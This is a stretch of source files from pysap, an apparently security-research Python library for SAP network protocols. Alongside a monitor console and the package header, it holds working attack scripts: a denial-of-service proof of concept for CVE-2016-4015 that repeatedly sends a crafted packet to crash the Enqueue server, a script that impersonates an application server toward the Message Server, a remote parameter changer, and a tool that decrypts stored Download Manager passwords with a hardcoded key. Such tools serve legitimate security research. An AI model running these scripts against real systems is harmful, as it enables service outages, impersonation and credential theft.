        # Send MS_GET_PROPERTY packet
        prop = SAPMSProperty(client=prop_client.client,
                             id=prop_id)
        response = self._send_simple(0x02, 0x01, opcode=0x44,
                                     property=prop)
        if response:
            self._print("Property %s for client %s:" % (ms_property_id_values[prop_id],
                                                        prop_client.client.strip()))
            response.property.show()

    def do_parameter_get(self, args):
        """ Get parameter value. Options: <parameter name> """

        parameter_name = args

        # Send ADM AD_PROFILE request
        adm = SAPMSAdmRecord(opcode=0x1, parameter=parameter_name)
        p = self._build(0x04, 0x05, adm_records=[adm])

        response = self.connection.sr(p)[SAPMS]

        if response:
            self._print("Parameter value: %s" % response.adm_records[0].parameter)

    def do_parameter_set(self, args):
        """ Set parameter value (requires monitor mode enabled).
            Options: <parameter name> <parameter value> """

        try:
            parameter_name, parameter_value = args.split(" ", 2)
        except ValueError:
            self._error("Invalid parameters !")
            return

        # Send ADM AD_SHARED_PARAMETER request
        adm = SAPMSAdmRecord(opcode=0x2e,
                             parameter="%s=%s" % (parameter_name,
                                                  parameter_value))
        p = self._build(0x04, 0x05, adm_records=[adm])

        response = self.connection.sr(p)[SAPMS]

        if response:
            if response.adm_records[0].errorno != 0:
                self._error("Error changing the parameter !")
            else:
                self._print("Parameter %s set to %s !" % (parameter_name,
                                                          parameter_value))


# Command line options parser
def parse_options():

    description = "This script is an example implementation of SAP's Message Server Monitor program (msmon). It " \
                  "allows the monitoring of a Message Server service and allows sending different commands and " \
                  "opcodes. Includes some commands not available on the msmon program. Some commands requires the " \
                  "server running in monitor mode, the most requires access to the Message Server internal port."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host",
                      help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3900,
                      help="Remote port [%default]")
    target.add_option("--route-string", dest="route_string",
                      help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-monitor",
                    help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    misc.add_option("--log-file", dest="logfile", metavar="FILE",
                    help="Log file")
    misc.add_option("--console-log", dest="consolelog", metavar="FILE",
                    help="Console log file")
    misc.add_option("--script", dest="script", metavar="FILE",
                    help="Script file to run")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not (options.remote_host or options.route_string):
        parser.error("Remote host or route string is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    ms_console = SAPMSMonitorConsole(options)

    try:
        if options.script:
            ms_console.do_script(options.script)
        else:
            ms_console.cmdloop()
    except KeyboardInterrupt:
        print("Cancelled by the user !")
        ms_console.do_exit(None)


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

"""
pysap
=====

[pysap](https://www.coresecurity.com/corelabs-research/open-source-tools/pysap)
is a Python library that provides modules for crafting and sending packets
using SAP's NI, Message Server, Router, RFC, SNC, Enqueue and Diag protocols.
The modules are build on top of [Scapy](http://www.secdev.org/projects/scapy/)
and are based on information acquired at researching the different protocols
and services.


Features
--------

* Dissection and crafting of the following network protocols:

    * SAP Network Interface (NI)
    * SAP Diag
    * SAP Enqueue
    * SAP Router
    * SAP Message Server (MS)
    * SAP SNC

* Client interfaces for handling the following file formats:

    * SAP SAR archive files

* Library implementing SAP's LZH and LZC compression algorithms.

* Automatic compression/decompression of payloads with SAP's algorithms.

* Client, proxy and server classes implemented for some of the protocols.

* Example scripts to illustrate the use of the different modules and protocols.


:copyright: (c) 2012-2017 by Martin Gallo, Core Security.
:license: GNU General Public License v2 or later (GPLv2+).
"""

__title__ = 'pysap'
"""The title of the library"""

__version__ = '0.1.13'
"""The version of pysap"""

__url__ = "https://www.coresecurity.com/corelabs-research/open-source-tools/pysap"
"""The URL for pysap's homepage"""

__repo__ = "https://github.com/CoreSecurity/pysap"
"""The URL for pysap's repository"""

__license__ = "GNU General Public License v2 or later (GPLv2+)"
"""The license governing the use and distribution of pysap"""



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# CVE and PoC by Vahagn Vardanyan
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

"""
vulnerable SAP packages 
SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC	
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC	
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE
SAP KERNEL 7.46 64-BIT UNICODE
SAP KERNEL 7.47 64-BIT UNICODE

Well works on Windows and Linux platforms

0:009> r
rax=00ffffffffffffff rbx=000000003ca9d9f0 rcx=000000000743f541
rdx=0000000000000001 rsi=0000000000000003 rdi=000000003cae4300
rip=000000013f0cdb75 rsp=000000000743f4b0 rbp=0000000000000000
 r8=0000000000000360  r9=0000000000000000 r10=0000000000000132
r11=000000000743f270 r12=000000000743f541 r13=000000003ca9d9f0
r14=0000000000000000 r15=000000013f3d5d00
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
enserver!IOThread::WalkNet+0x575:
00000001`3f0cdb75 ff10            call    qword ptr [rax] ds:00ffffff`ffffffff=????????????????
"""

# Standard imports
import logging
from time import sleep
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPEnqueue import SAPEnqueue
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This example script can be used to tests against CVE-2016-4015 Denial of Service vulnerability" \
                  "affecting the Enqueue service. For more details about the vulnerability see Advisory " \
                  "https://erpscan.com/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host",
                      help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3200,
                      help="Remote port [%default]")
    target.add_option("--route-string", dest="route_string",
                      help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-l", "--loop", dest="loop", action="store_true", default=False,
                    help="Loop until the user cancel (Ctrl+C) [%default]")
    misc.add_option("-n", "--number", dest="number", type="int", default=10,
                    help="Number of packets to send [%default]")
    misc.add_option("-t", "--time", dest="delay", type="int", default=5,
                    help="Time to wait between each round [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    misc.add_option("--terminal", dest="terminal", default=None,
                    help="Terminal name")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not (options.remote_host or options.route_string):
        parser.error("Remote host or route string is required")

    return options


def send_crash(host, port, item, verbose, route=None):
    # Create the connection to the SAP Netweaver server
    if verbose:
        print("[*] Sending crash")
    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(host, port, route, base_cls=SAPEnqueue)
    conn.send(item)


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing Enqueue Server CVE-2016-4015 DoS vulnerability on host %s:%d" % (options.remote_host,
                                                                                        options.remote_port))

    # Crafting the item
    payload = Raw("\x06\x01\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00"
                  "\x00\x00\x00\x03Vahagn-pc_5276_0\x00\x00\x00\x00\x02\x00\x00\x00;\x00\x00\x00\x05\x00\x00\x00\x03"
                  "\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x01")
    item = SAPEnqueue(len_frag=89, id=0, more_frags=129, type=187, dest=243, len=89, opcode=160)/payload

    try:
        if options.loop:
            try:
                while True:
                    send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
                    sleep(options.delay)
            except KeyboardInterrupt:
                print("[*] Cancelled by the user")
        else:
            for i in range(options.number):
                send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
                sleep(options.delay)

    except SocketError:
        print("[*] Connection error, take a look at the enqueue server process !")


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPMS import SAPMS, SAPMSProperty, SAPMSLogon
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0
conf.debug_dissector = True


# Command line options parser
def parse_options():

    description = "This example script connects with the Message Server service of a SAP Netweaver Application Server "\
                  "and impersonates an application server registering as a Dialog instance server."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host> -l <logon address>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host",
                      help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3900,
                      help="Remote port [%default]")
    target.add_option("-l", "--logon", dest="logon_address",
                      help="Logon address")
    target.add_option("--route-string", dest="route_string",
                      help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-impersonator",
                    help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not (options.remote_host or options.route_string):
        parser.error("Remote host or route string is required")
    if not options.logon_address:
        parser.error("Logon address is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    # Set release information
    prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0)
    p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x43, property=prop)
    print("[*] Setting release information")
    conn.send(p)

    # Perform the login enabling the DIA+BTC+ICM services
    p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname=options.client)
    print("[*] Sending login packet")
    conn.sr(p)[SAPMS]
    print("[*] Login performed")

    # Changing the status to starting
    p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname=options.client)
    print("[*] Changing server's status to starting")
    conn.send(p)

    # Set IP address
    p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x06, opcode_version=0x01,
              change_ip_addressv4=options.logon_address)
    print("[*] Setting IP address")
    response = conn.sr(p)[SAPMS]
    print("[*] IP address set")
    response.show()

    # Set logon information
    l = SAPMSLogon(type=2, port=3200, address=options.logon_address, host=options.client, misc="LB=3")
    p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x2b, logon=l)
    print("[*] Setting logon information")
    response = conn.sr(p)[SAPMS]
    print("[*] Logon information set")
    response.show()

    # Set the IP Address property
    prop = SAPMSProperty(client=options.client, id=0x03, address=options.logon_address)
    p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname=options.client,
              opcode=0x43, property=prop)
    print("[*] Setting IP address property")
    response = conn.sr(p)[SAPMS]
    print("[*] IP Address property set")
    response.show()

    # Changing the status to active
    p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname=options.client)
    print("[*] Changing server's status to active")
    conn.send(p)

    # Wait for connections
    try:
        while True:
            response = conn.recv()[SAPMS]
            response.show()

    except KeyboardInterrupt:
        print("[*] Cancelled by the user !")

    # Send MS_LOGOUT packet
    p = SAPMS(flag=0x00, iflag=0x04, toname="MSG_SERVER", fromname=options.client)
    print("[*] Sending logout packet")
    conn.send(p)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPMS import SAPMS, SAPMSAdmRecord
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This example script changes a parameter using Message Server Administration requests. In order to " \
                  "be able to change a parameter the Message Server should be configured in monitoring mode " \
                  "(ms/monitor=1)[1] and the internal port should be reachable. Keep in mind that some of the " \
                  "parameters are not dynamic and can't be changed using this method. If the parameter value is not " \
                  "specified, the script retrieve the current value. " \
                  "[1] https://help.sap.com/saphelp_nw70/helpdata/en/4e/cffdb69d10424e97eb1d993b1e2cfd/content.htm"

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host> -n <parameter name> [-l <parameter value>]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host",
                      help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3900,
                      help="Remote port [%default]")
    target.add_option("--route-string", dest="route_string",
                      help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    param = OptionGroup(parser, "Parameter")
    param.add_option("-n", "--parameter-name", dest="param_name",
                     help="Parameter name")
    param.add_option("-l", "--parameter-value", dest="param_value",
                     help="Parameter value")
    parser.add_option_group(param)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-paramchanger",
                    help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not (options.remote_host or options.route_string):
        parser.error("Remote host or route string is required")
    if not options.param_name:
        parser.error("Parameter name is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    client_string = options.client

    # Build MS_LOGIN_2 packet
    p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string)

    # Send MS_LOGIN_2 packet
    print("[*] Sending login packet")
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)
    server_string = response.fromname

    print("[*] Retrieving current value of parameter: %s" % options.param_name)

    # Send ADM AD_PROFILE request
    adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name)
    p = SAPMS(toname=server_string, fromname=client_string, version=4,
              flag=0x04, iflag=0x05, adm_records=[adm])

    print("[*] Sending packet")
    response = conn.sr(p)[SAPMS]

    if options.verbose:
        print("[*] Response:")
        response.show()

    param_old_value = response.adm_records[0].parameter
    print("[*] Parameter %s" % param_old_value)

    # If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request
    if options.param_value:
        print("[*] Changing parameter value from: %s to: %s" % (param_old_value,
                                                                options.param_value))

        # Build the packet
        adm = SAPMSAdmRecord(opcode=0x2e,
                             parameter="%s=%s" % (options.param_name,
                                                  options.param_value))
        p = SAPMS(toname=server_string, fromname=client_string, version=4,
                  iflag=5, flag=4, adm_records=[adm])

        # Send the packet
        print("[*] Sending packet")
        response = conn.sr(p)[SAPMS]

        if options.verbose:
            print("[*] Response:")
            response.show()

        if response.adm_records[0].errorno != 0:
            print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno)
        else:
            print("[*] Parameter changed for the current session !")


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from sys import platform
from struct import pack, unpack
from optparse import OptionParser
from subprocess import check_output
# Custom imports
import pysap
# pyCrypto import
try:
    from Crypto.Cipher import AES
except ImportError:
    AES = None


# Java serialization decoding. Taken from http://stackoverflow.com/a/16470856
def parse_java(f):
    h = lambda s: ' '.join('%.2X' % ord(x) for x in s)  # format as hex
    p = lambda s: sum(ord(x)*256**i for i, x in enumerate(reversed(s)))  # parse integer
    magic = f.read(2)
    assert magic == '\xAC\xED', h(magic)  # STREAM_MAGIC
    assert p(f.read(2)) == 5  # STREAM_VERSION
    handles = []

    def parse_obj():
        b = f.read(1)
        if not b:
            raise StopIteration  # not necessarily the best thing to throw here.
        if b == '\x70':  # p TC_NULL
            return None
        elif b == '\x71':  # q TC_REFERENCE
            handle = p(f.read(4)) - 0x7E0000  # baseWireHandle
            o = handles[handle]
            return o[1]
        elif b == '\x74': # t TC_STRING
            string = f.read(p(f.read(2))).decode('utf-8')
            handles.append(('TC_STRING', string))
            return string
        elif b == '\x75': # u TC_ARRAY
            data = []
            cls = parse_obj()
            size = p(f.read(4))
            handles.append(('TC_ARRAY', data))
            assert cls['_name'] in ('[B', '[I'), cls['_name']
            for x in range(size):
                data.append(f.read({'[B': 1, '[I': 4}[cls['_name']]))
            return data
        elif b == '\x7E': # ~ TC_ENUM
            enum = {}
            enum['_cls'] = parse_obj()
            handles.append(('TC_ENUM', enum))
            enum['_name'] = parse_obj()
            return enum
        elif b == '\x72': # r TC_CLASSDESC
            cls = {'fields': []}
            full_name = f.read(p(f.read(2)))
            cls['_name'] = full_name.split('.')[-1] # i don't care about full path
            f.read(8) # uid
            cls['flags'] = f.read(1)
            handles.append(('TC_CLASSDESC', cls))
            assert cls['flags'] in ('\2', '\3', '\x0C', '\x12'), h(cls['flags'])
            b = f.read(2)
            for i in range(p(b)):
                typ = f.read(1)
                name = f.read(p(f.read(2)))
                fcls = parse_obj() if typ in 'L[' else ''
                cls['fields'].append((name, typ, fcls.split('/')[-1])) # don't care about full path
            b = f.read(1)
            assert b == '\x78', h(b)
            cls['parent'] = parse_obj()
            return cls
        # TC_OBJECT
        assert b == '\x73', (h(b), h(f.read(4)), repr(f.read(50)))
        obj = {}
        obj['_cls'] = parse_obj()
        obj['_name'] = obj['_cls']['_name']
        handle = len(handles)
        parents = [obj['_cls']]
        while parents[0]['parent']:
            parents.insert(0, parents[0]['parent'])
        handles.append(('TC_OBJECT', obj))
        for cls in parents:
            for name, typ, fcls in cls['fields'] if cls['flags'] in ('\2', '\3') else []:
                if typ == 'I': # Integer
                    obj[name] = p(f.read(4))
                elif typ == 'S': # Short
                    obj[name] = p(f.read(2))
                elif typ == 'J': # Long
                    obj[name] = p(f.read(8))
                elif typ == 'Z': # Bool
                    b = f.read(1)
                    assert p(b) in (0, 1)
                    obj[name] = bool(p(b))
                elif typ == 'F': # Float
                    obj[name] = h(f.read(4))
                elif typ in 'BC': # Byte, Char
                    obj[name] = f.read(1)
                elif typ in 'L[': # Object, Array
                    obj[name] = parse_obj()
                else: # Unknown
                    assert False, (name, typ, fcls)
            if cls['flags'] in ('\3', '\x0C'): # SC_WRITE_METHOD, SC_BLOCKDATA
                b = f.read(1)
                if b == '\x77': # see the readObject / writeObject methods
                    block = f.read(p(f.read(1)))
                    if cls['_name'].endswith('HashMap') or cls['_name'].endswith('Hashtable'):
                        # http://javasourcecode.org/html/open-source/jdk/jdk-6u23/java/util/HashMap.java.html
                        # http://javasourcecode.org/html/open-source/jdk/jdk-6u23/java/util/Hashtable.java.html
                        assert len(block) == 8, h(block)
                        size = p(block[4:])
                        obj['data'] = [] # python doesn't allow dicts as keys
                        for i in range(size):
                            k = parse_obj()
                            v = parse_obj()
                            obj['data'].append((k, v))
                        try:
                            obj['data'] = dict(obj['data'])
                        except TypeError:
                            pass # non hashable keys
                    elif cls['_name'].endswith('HashSet'):
                        # http://javasourcecode.org/html/open-source/jdk/jdk-6u23/java/util/HashSet.java.html
                        assert len(block) == 12, h(block)
                        size = p(block[-4:])
                        obj['data'] = []
                        for i in range(size):
                            obj['data'].append(parse_obj())
                    elif cls['_name'].endswith('ArrayList'):
                        # http://javasourcecode.org/html/open-source/jdk/jdk-6u23/java/util/ArrayList.java.html
                        assert len(block) == 4, h(block)
                        obj['data'] = []
                        for i in range(obj['size']):
                            obj['data'].append(parse_obj())
                    else:
                        assert False, cls['_name']
                    b = f.read(1)
                assert b == '\x78', h(b) + ' ' + repr(f.read(30)) # TC_ENDBLOCKDATA
        handles[handle] = ('py', obj)
        return obj
    objs = []
    while 1:
        try:
            objs.append(parse_obj())
        except StopIteration:
            return objs


def parse_config_file(filename, decrypt=False, serial_number=None):
    print("[*] Opening DLManager config file: %s" % filename)

    try:
        with open(filename, 'r') as fil:
            data = parse_java(fil)[0]["data"]
    except:
        print("[-] Error reading configuration file or invalid file")
        return

    print("[*] Read %d config values from config file" % len(data))
    for item in data:
        value = ""
        if isinstance(data[item], basestring):
            value = data[item]
        elif "value" in data[item]:
            value = data[item]["value"]
        elif "_name" in data[item] and data[item]["_name"] == "StringWrapper":
            value = data[item]["maBuffer"]
            if value:
                value = unwrap(value, decrypt, serial_number)
        print("[*] Key=%s, Value=%s" % (item, value))


def build_key(serial_number):
    key = "hgjZ@Fk*0!N%0Un*"
    if serial_number:
        key = serial_number + key
    return key[:16]


def decrypt(cipher_text, key):
    aes = AES.new(key, AES.MODE_CBC, "\x00" * 16)       # Build the cipher using an empty IV
    plain_text = aes.decrypt(cipher_text)               # Decrypt
    plain_text = plain_text[0:-ord(plain_text[-1])]     # Unpad the plain text
    return plain_text


def unwrap(value, encrypted=False, serial_number=None):
    pos = len(value)
    unwrapped = []
    for i in range(len(value)):
        pos -= 1
        (item, ) = unpack(">i", value[pos])             # Unpack the int value
        item = item - 50 + pos                          # Apply the transformation
        (item, ) = unpack(">b", pack(">i", item)[3:])   # Pack as int and drop first 3 bytes
        unwrapped.append(item)

    if encrypted:
        cipher_text = b"".join([pack(">b", x) for x in unwrapped])
        key = build_key(serial_number)
        print("[*] Decrypt using key: %s" % key)
        unwrapped = decrypt(cipher_text, key)
        if len(unwrapped) == 0:
            print("[-] Decryption failed. Maybe used a wrong serial number?")

    else:
        try:
            unwrapped = b"".join(map(chr, unwrapped))
        except ValueError:
            print("[-] Invalid stored value. Maybe it's encrypted?")
            unwrapped = None

    return unwrapped


def retrieve_serial_number():
    if platform.startswith("linux"):
        return ""
    elif platform.startswith("win"):
        output = check_output(["wmic", "bios", "get", "serialnumber"])
        output = output.strip().split("\n")[1]
        return output
    elif platform.startswith("darwin"):
        raise NotImplementedError


# Main function
def main():
    # Parse command line options
    description = "This example script extract SAP's Download Manager stored passwords. For SAP Download Manager "   \
                  "versions before 2.1.140a, stored passwords were kept unencrypted. For versions between 2.1.140a " \
                  "and 2.1.142, the script should be able to decrypt the password given possible to obtain the "     \
                  "machine serial number. For more details on the encryption mechanism see CVE-2016-3685, "          \
                  "CVE-2016-3684 documented at " \
                  "https://www.coresecurity.com/advisories/sap-download-manager-password-weak-encryption."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -f <config filename>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    parser.add_option("-f", "--filename", dest="filename", metavar="FILE",
                      help="DLManager config filename")
    parser.add_option("-e", "--encrypted", dest="encrypted", action="store_true",
                      help="If passwords are stored encrypted (version >= 2.1.140a)")
    parser.add_option("-s", "--serial-number", dest="serial_number",
                      help="The machine's BIOS serial number")
    parser.add_option("-r", "--retrieve-serial-number", dest="retrieve", action="store_true",
                      help="If the script should try to retrieve the serial number from the machine and use it for "
                           "decryption")
    (options, args) = parser.parse_args()

    if not options.filename:
        parser.error("[-] DLManager config filename required !")

    if options.retrieve:
        print("[*] Trying to retrieve the machine's serial number")
        options.serial_number = retrieve_serial_number()
        options.encrypted = True
        print("[*] Retrieved serial number: %s" % options.serial_number)

    if options.encrypted and AES is None:
        parser.error("[-] pyCrypto library required to decrypt not found !")

    parse_config_file(options.filename, options.encrypted, options.serial_number)


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import stat
from zlib import crc32
from struct import pack
from datetime import datetime
from os import stat as os_stat
from cStringIO import StringIO
# External imports
from scapy.packet import Packet
from scapy.fields import (ByteField, ByteEnumField, LEIntField, FieldLenField,
                          PacketField, StrFixedLenField, PacketListField,
                          ConditionalField, LESignedIntField, StrField)
# Custom imports
from pysap.utils import (PacketNoPadded, StrNullFixedLenField, PacketListStopField)
from pysapcompress import (decompress, compress, ALG_LZH, CompressError,
                           DecompressError)


# Filemode code obtained from Python 3 stat.py
_filemode_table = (
    ((stat.S_IFLNK,         "l"),
     (stat.S_IFREG,         "-"),
     (stat.S_IFBLK,         "b"),
     (stat.S_IFDIR,         "d"),
     (stat.S_IFCHR,         "c"),
     (stat.S_IFIFO,         "p")),

    ((stat.S_IRUSR,         "r"),),
    ((stat.S_IWUSR,         "w"),),
    ((stat.S_IXUSR|stat.S_ISUID, "s"),
     (stat.S_ISUID,         "S"),
     (stat.S_IXUSR,         "x")),

    ((stat.S_IRGRP,         "r"),),
    ((stat.S_IWGRP,         "w"),),
    ((stat.S_IXGRP|stat.S_ISGID, "s"),
     (stat.S_ISGID,         "S"),
     (stat.S_IXGRP,         "x")),

    ((stat.S_IROTH,         "r"),),
    ((stat.S_IWOTH,         "w"),),
    ((stat.S_IXOTH|stat.S_ISVTX, "t"),
     (stat.S_ISVTX,         "T"),
